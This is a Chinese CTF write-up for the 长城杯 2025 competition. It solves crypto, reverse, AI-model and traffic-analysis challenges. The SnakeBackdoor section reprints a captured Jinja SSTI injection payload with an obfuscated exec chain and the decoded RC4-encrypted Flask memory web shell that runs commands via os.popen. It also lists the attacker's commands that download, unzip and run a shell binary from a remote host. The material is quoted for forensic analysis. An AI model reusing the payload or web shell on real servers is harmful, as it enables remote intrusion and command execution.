长城杯 2025 WriteUp

看到这篇博客记得提醒我去复现,等我度过期末周(求善待

AI Security

欺诈猎手的后门陷阱 [todo]

pth模型实际格式是ubjson
显示结构树:

python
1import xgboost as xgb
2from xgboost import plot_tree
3from matplotlib import pyplot
4
5model = xgb.Booster()
6model.load_model("fraud_detector_supply_chain.ubj")
7model.save_model('model.json')
8plot_tree(model, num_trees=0, rankdir='TD')
9pyplot.show()

alt text

The Silent Heist

非预期:提给数据丢进Excel,不同列的数据+0.01,凑到4k行
alt text
flag{9e2e22a8-e361-49b1-9113-1bc9713b780a}

Web

Deprecated [todo]

sh
1pnpm i express body-parser cookie-parser nunjucks jsonwebtoken better-sqlite3

Crypto

EZFlag

python
 1fib = [0] * 24
 2fib[0] = 0
 3fib[1] = 1
 4for i in range(2, 24):
 5    fib[i] = (fib[i-1] + fib[i-2]) % 16
 6
 7K = "012ab9c3478d56ef"
 8v11 = 1
 9flag_chars = []
10
11for i in range(32):
12    index_fib = v11 % 24
13    fib_val = fib[index_fib]
14    c = K[fib_val]
15    flag_chars.append(c)
16    
17    v11 = (v11 * 8 + (i + 64)) % 24
18
19flag_str = ''.join(flag_chars)
20print(f"flag{{{flag_str[:8]}-{flag_str[8:13]}-{flag_str[13:18]}-{flag_str[18:23]}-{flag_str[23:]}}}")

flag{10632674-1d219-09f29-147a2-760632674}但是错
考虑64位溢出:

python
 1import ctypes
 2
 3uint64_t = ctypes.c_uint64
 4
 5fib = [0] * 24
 6fib[0] = 0
 7fib[1] = 1
 8for i in range(2, 24):
 9    fib[i] = (fib[i-1] + fib[i-2]) % 16
10
11K = "012ab9c3478d56ef"
12
13v11 = uint64_t(1)
14flag_chars = []
15
16for i in range(32):
17    index_fib = v11.value % 24
18    fib_val = fib[index_fib]
19    c = K[fib_val]
20    flag_chars.append(c)
21    v11.value = v11.value * 8 + (i + 64)
22
23flag_str = ''.join(flag_chars)
24
25print(f"flag{{{flag_str[:8]}-{flag_str[8:13]}-{flag_str[13:18]}-{flag_str[18:23]}-{flag_str[23:]}}}")

flag{10632674-1d219-09f29-14769-f60219a24}

流量分析

SnakeBackdoor-1

筛选http流量,找到这个请求
alt text
flag{zxcvbnm123}

SnakeBackdoor-2

筛选http,搜索SECRET_KEY找到
alt text
flag{c6242af0-6891-4510-8432-e1cdf051f160}

SnakeBackdoor-3

alt text

jinja
1{{url_for.__globals__['__builtins__']['exec']("import base64; exec(base64.b64decode('XyA9IGxhbWJkYSBfXyA6IF9faW1wb3J0X18oJ3psaWInKS5kZWNvbXByZXNzKF9faW1wb3J0X18oJ2Jhc2U2NCcpLmI2NGRlY29kZShfX1s6Oi0xXSkpOwpleGVjKChfKShiJz1jNENVM3hQKy8vdlB6ZnR2OGdyaTYzNWEwVDFyUXZNbEtHaTNpaUJ3dm02VEZFdmFoZlFFMlBFajdGT2NjVElQSThUR3FaTUMrbDlBb1lZR2VHVUFNY2Fyd1NpVHZCQ3YzN3lzK04xODVOb2NmbWpFL2ZPSGVpNE9uZTBDTDVUWndKb3BFbEp4THI5VkZYdlJsb2E1UXZyamlUUUtlRytTR2J5Wm0rNXpUay9WM25aMEc2TmVhcDdIdDZudSthY3hxc3Ivc2djNlJlRUZ4ZkVlMnAzMFlibXl5aXMzdWFWMXArQWowaUZ2cnRTc01Va2hKVzlWOVMvdE8rMC82OGdmeUtNL3lFOWhmNlM5ZUNEZFFwU3lMbktrRGlRazk3VFV1S0RQc09SM3BRbGRCL1VydmJ0YzRXQTFELzljdFpBV2NKK2pISkwxaytOcEN5dktHVmh4SDhETEw3bHZ1K3c5SW5VLzl6dDFzWC9Uc1VSVjdWMHhFWFpOU2xsWk1acjFrY0xKaFplQjhXNTl5bXhxZ3FYSkpZV0ppMm45NmhLdFNhMmRhYi9GMHhCdVJpWmJUWEZJRm1ENmtuR3ovb1B4ZVBUenVqUHE1SVd0OE5abXZ5TTVYRGcvTDhKVS9tQzRQU3ZYQStncWV1RHhMQ2x6Uk5ESEpVbXZ0a2FMYkp2YlpjU2c3VGdtN1VTZUpXa0NRb2pTaStJTklFajVjTjErRkZncEtSWG40Z1I5eXAzL1Y3OVduU2VFRklPNkM0aGNKYzRtd3BrKzA5dDF5dWU0K21BbGJobHhuWE0xUGZrK3NHQm1hVUZFMWtFak9wbmZHbnFzVithdU9xakpnY0RzaXZJZCt3SFBIYXp0NU1WczRySFJoWUJPQjZ5WGp1R1liRkhpM1hLV2hiN0FmTVZ2aHg3RjlhUGpObUlpR3FCVS9oUkZVdU1xQkNHK1ZWVVZBYmQ1cEZEVFpKM1A4d1V5bTZRQUFZUXZ4RytaSkRSU1F5cE9oWEsvTDRlRkZ0RXppdWZaUFN5cllQSldKbEFRc0RPK2RsaTQ2Y24xdTVBNUh5cWZuNHZ3N3pTcWUrVlVRL1JpL0tudjBwUW9XSDFkOWRHSndEZnFtZ3ZuS2krZ05SdWdjZlVqRzczVjZzL3RpaGx0OEIyM0t2bUp6cWlMUHptdWhyMFJGVUpLWmpHYTczaUxYVDRPdmxoTFJhU2JUVDR0cS9TQ2t0R1J5akxWbVNqMmtyMEdTc3FUamxMMmw2Yy9jWEtXalJNdDFrTUNtQ0NUVithSmU0bnB2b0I5OU9NbktuWlI0WXM1MjZtVEZUb1N3YTVqbXhCbWtSWUNtQTgyR0ZLN2FrNmJJUlRmRE1zV0dzWnZBRVh2M1BmdjVOUnpjSUZOTzN0YlFrZUIvTElWT1c1TGZBa21SNjgvNnpyTDBEWm9QanpGWkk1VkxmcTBydjlDd1VlSmtSM1BIY3VqKytkL2xPdms4L2gzSHpTZ1lUR0N3bDF1ano4aDRvVWlQeUdUNzROamJZN2ZKOHZVSHFOeitaVmZPdFZ3L3ozUk11cVNVekVBS3JqY1UyRE5RZWhCMG9ZN3hJbE9UOXU5QlQ0Uk9vREZvKzVaRjZ6Vm9IQTRlSWNrWFVPUDN5cFF2NXBFWUcrMHBXNE15SG1BUWZzT2FXeU1kZk1vcWJ3L005b0ltZEdLZEt5MVdxM2FxK3QreHV5VmROQVFNaG9XMkE3elF6b2I4WEdBM0c4VnVvS0hHT2NjMjVIQ2IvRlllU3hkd3lJZWRBeGtsTExZTUJIb2pUU3BEMWRFeG96ZGk4OUdpa2h6MzMwNW5kVG1FQ3YwWm9VT0hhY25xdFVVaEpseTdWZ3ZYK0psYXdBWTlvck5QVW1aTTdRS2JkT2tUZi9vOGFRbFM1RmUveFFrT01KR200TlhxTGVoaVJJYjkyNXNUZlZ4d29OZlA1djFNR2xhcllNaWZIbDJyRXA1QzcxaXBGanBBR2FFcDluUmowSmdFYTRsU1R1WWVWWHdxYlpRVDNPZlF2Z3QvYkhKbEFndXFTV3lzR2hxaElUSllNNlQxMG03MUppd2ZRSDVpTFhINVhiRms1M1FHY0cyY0FuRnJXeTcweEV2YWJtZjB1MGlrUXdwVTJzY1A4TG9FYS9DbEpuUFN1V3dpY01rVkxya1pHcW5CdmJrNkpUZzdIblQwdkdVY1Y2a2ZmSUw2Q0szYkUxRnkwUjZzbCtVUG9ZdmprZ1NJM1ViZkQ2N2JSeEl4ZWdCcFlUenlDRHpQeXRTRSthNzdzZHhzZ2hMcFVDNWh4ejRaZVhkeUlyYm1oQXFRdzVlRW5CdUFTRTVxVE1Ka1RwLy9oa3krZFQycGNpT0JZbi9BQ1NMeHByTFowQXkxK3pobCtYeVY5V0ZMNE5nQm9IMzRidmt4SDM2bmN0c3pvcFdHUHlkMTRSaVM0ZDBFcU5vY3F2dFd1M1l4a05nUCs4Zk0vZC9CMGlreEt4aC9HamttUVhhU1gvQis0MFU0YmZTYnNFSnBWT3NUSFR5NnUwTnI2N1N3N0J2Und1VnZmVDAvOGo3M2dZSEJPMmZHU0lKNDdBcllWbTIrTHpSVDBpSDVqN3lWUm1wdGNuQW44S2t4SjYzV0JHYjd1M2JkK0QrM3lsbm0xaDRBUjdNR042cjZMeHBqTmxBWDExd2EvWEIxek44Y1dVTm5DM1ZjemZ3VUV3UGZpNWR5bzluRUM1V085VW03OFdLUnJtM2M0OEl2VFVoZ2ROZVFFRG9zSWZoTVNtaWtFbHVRWDhMY0NSY0s5ZVVUODVidnI1SjVyekViK0R1aUdZeURGRzdQWmVmdkliM3czM3UycTh6bHhsdFdDU3RjNU80cThpV3JWSTd0YVpIeG93VHc1ekpnOVRkaEJaK2ZRclF0YzB5ZHJCbHZBbG5ZMTB2RUNuRlVCQSt5MWxXc1ZuOGNLeFVqVGRhdGk0QUYzaU0vS3VFdFE2Wm44Ykk0TFl3TWxHbkNBMVJHODhKOWw3RzRkSnpzV3I5eE9pRDhpTUkyTjFlWmQvUVV5NDNZc0lMV3g4MHlpQ3h6K0c0YlhmMnFOUkZ2Tk9hd1BTbnJwdjZRMG9GRVpvamx1UHg3Y09VMjdiQWJncHdUS28wVlV5SDZHNCt5c3ZpUXpVN1NSZDUxTEdHM1U2Y1QwWURpZFFtejJld3Ria2tLY0dWY1N5WU9lQ2xWNkNSejZiZEYvR20zVDIrUTkxNC9sa1piS3gxOVduWDc4cit4dzZicGp6V0xyMEUxZ2puS0NWeFcwWFNud2UraUc5ZGtHOG5DRmZqVWxoZFRhUzFnSjdMRnNtVWpuOHUvdlJRYlJMdy95NjZJcnIveW5LT0N6Uk9jZ3JuREZ4SDN6M0pUUVFwVGlEcGV5elJzRjRTbkdCTXY1SGJyK2NLNllUYTRNSWJmemo1VGkzRk1nSk5xZ0s1WGs5aHNpbEdzVTZ0VWJucDZTS2lKaFV2SjhicXluVU1Fem5kbCtTK09WUkNhSDJpSmw4VTNXanlCNjhScTRIQVRrL2NLN0xrSkhITWpDM1c3ZFRtT0JwZm9XTVZFTGFMK1JrcVdZdjBDcFc1cUVOTGxuT1BCckdhR05lSVphaHpibnJ1RVBJSVhHa0d6MWZFNWQ0Mk1hS1pzQ1VZdDF4WGlhaTkrY2JLR2ovZDBsSUNxN3VjN2JSaEVCeDQ2RHlCWFR6MWdmSm5UMnVyNng0QXZiNXdZMnBjWXJjRDJPUjZBaWtNdm0yYzBiaGFiSkI2bzBEaE9OSjRsQ3htS2RHQnp1d3J0czF1MEQyeXVvMzd5TExmc0dEdXllcE53OGx5VE5jMm55aENWQmZXMjNEbkJRbVdjMVFMQ29ScHBWaGpLWHdPcE9ES084UjhZSG5RTStyTGs2RU9hYkNkR0s1N2lSek1jVDN3YzQzNmtWbUhYRGNJMFpzWUdZNWFJQzVEYmRXalV0Mlp1VTBMbXVMd3pDVFM5OXpoT29POERLTnFiSzRiSU5MeUFJMlg5Mjh4aWIraG1JT3FwM29TZ0MyUGRGYzh5cXRoTjlTNTVvbXRleDJ4a0VlOENZNDhDNno0SnRxVnRxaFBRV1E4a3RlNnhsZXBpVllDcUliRTJWZzRmTi8vTC9mZi91Ly85cDRMejd1cTQ2eVdlbmtKL3g5MGovNW1FSW9yczVNY1N1Rmk5ZHlneXlSNXdKZnVxR2hPZnNWVndKZScpKQ=='))", {'request':url_for.__globals__['request'],'app':get_flashed_messages.__globals__['current_app']})}}

alt text

python
1_ = lambda __ : __import__('zlib').decompress(__import__('base64').b64decode(__[::-1]));
2print((_)(b'=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'))

手撕一下

python
1global exc_class\nglobal code\nimport os,binascii\nexc_class, code = app._get_exc_class_and_code(404)\nRC4_SECRET = b\'v1p3r_5tr1k3_k3y\'\ndef rc4_crypt(data: bytes, key: bytes) -> bytes:\n\tS = list(range(256))\n\tj = 0\n\tfor i in range(256):\n\t\tj = (j + S[i] + key[i % len(key)]) % 256\n\t\tS[i], S[j] = S[j], S[i]\n\ti = j = 0\n\tres = bytearray()\n\tfor char in data:\n\t\ti = (i + 1) % 256\n\t\tj = (j + S[i]) % 256\n\t\tS[i], S[j] = S[j], S[i]\n\t\tres.append(char ^ S[(S[i] + S[j]) % 256])\n\treturn bytes(res)\ndef backdoor_handler():\n\tif request.headers.get(\'X-Token-Auth\') != \'3011aa21232beb7504432bfa90d32779\':\n\t\treturn "Error"\n\tenc_hex_cmd = request.form.get(\'data\')\n\tif not enc_hex_cmd:\n\t\treturn ""\n\ttry:\n\t\tenc_cmd = binascii.unhexlify(enc_hex_cmd)\n\t\tcmd = rc4_crypt(enc_cmd, RC4_SECRET).decode(\'utf-8\', errors=\'ignore\')\n\t\toutput_bytes = getattr(os, \'popen\')(cmd).read().encode(\'utf-8\', errors=\'ignore\')\n\t\tenc_output = rc4_crypt(output_bytes, RC4_SECRET)\n\t\treturn binascii.hexlify(enc_output).decode()\n\texcept:\n\t\treturn "Error"\napp.error_handler_spec[None][code][exc_class]=lambda error: backdoor_handler()
python
 1global exc_class
 2global code
 3import os, binascii
 4
 5exc_class, code = app._get_exc_class_and_code(404)
 6RC4_SECRET = b"v1p3r_5tr1k3_k3y"
 7
 8
 9def rc4_crypt(data: bytes, key: bytes) -> bytes:
10    S = list(range(256))
11    j = 0
12    for i in range(256):
13        j = (j + S[i] + key[i % len(key)]) % 256
14        S[i], S[j] = S[j], S[i]
15    i = j = 0
16    res = bytearray()
17    for char in data:
18        i = (i + 1) % 256
19        j = (j + S[i]) % 256
20        S[i], S[j] = S[j], S[i]
21        res.append(char ^ S[(S[i] + S[j]) % 256])
22    return bytes(res)
23
24
25def backdoor_handler():
26    if request.headers.get("X-Token-Auth") != "3011aa21232beb7504432bfa90d32779":
27        return "Error"
28    enc_hex_cmd = request.form.get("data")
29    if not enc_hex_cmd:
30        return ""
31    try:
32        enc_cmd = binascii.unhexlify(enc_hex_cmd)
33        cmd = rc4_crypt(enc_cmd, RC4_SECRET).decode("utf-8", errors="ignore")
34        output_bytes = getattr(os, "popen")(cmd).read().encode("utf-8", errors="ignore")
35        enc_output = rc4_crypt(output_bytes, RC4_SECRET)
36        return binascii.hexlify(enc_output).decode()
37    except:
38        return "Error"
39
40
41app.error_handler_spec[None][code][exc_class] = lambda error: backdoor_handler()

flag{v1p3r_5tr1k3_k3y}

SnakeBackdoor-4

alt text
可以看到从这里开始,攻击者开始和木马交互
数据使用rc4加密
交互:

text
 1> id
 2< uid=0(root) gid=0(root) groups=0(root)
 3
 4> ls -al
 5> total 36
 6drwxr-xr-x  5 root root  4096 Dec 20 13:55 .
 7drwxrwxrwt 18 root root 12288 Dec 21 00:00 ..
 8-rw-r--r--  1 roø
 9
10> curl 192.168.1.201:8080/shell.zip -o /tmp/123.zip
11
12> unzip -P nf2jd092jd01 -d /tmp /tmp/123.zip
13< Archive:  /tmp/123.zip
14  inflating: /tmp/shell              
15
16> mv /tmp/shell /tmp/python3.13
17
18> chmod +x /tmp/python3.13
19
20> /tmp/python3.13

flag{python3.13}

SnakeBackdoor-5 [todo]

提取shell.zip,解压密码nf2jd092jd01,得到shell

Reverse

wasm-login

js
 1import { authenticate } from './build/release.js';
 2import CryptoJS from './crypto-js.js';
 3
 4// 2025-12-21 16:57:16
 5
 6const edittime = new Date('2025-12-21T16:57:16Z').getTime();
 7
 8for (let time = edittime - 3000000; time <= edittime + 3000000; time += 1) {
 9    Date.now = () => time;
10
11    const check = CryptoJS.MD5(authenticate("admin", "admin");).toString(CryptoJS.enc.Hex);
12
13    if (check.startsWith("ccaf33e3512e31f3")) {
14        console.log(`Found time: ${time}, hash: ${check}`);
15        break;
16    }
17}

flag{ccaf33e3512e31f36228f0b97ccbc8f1}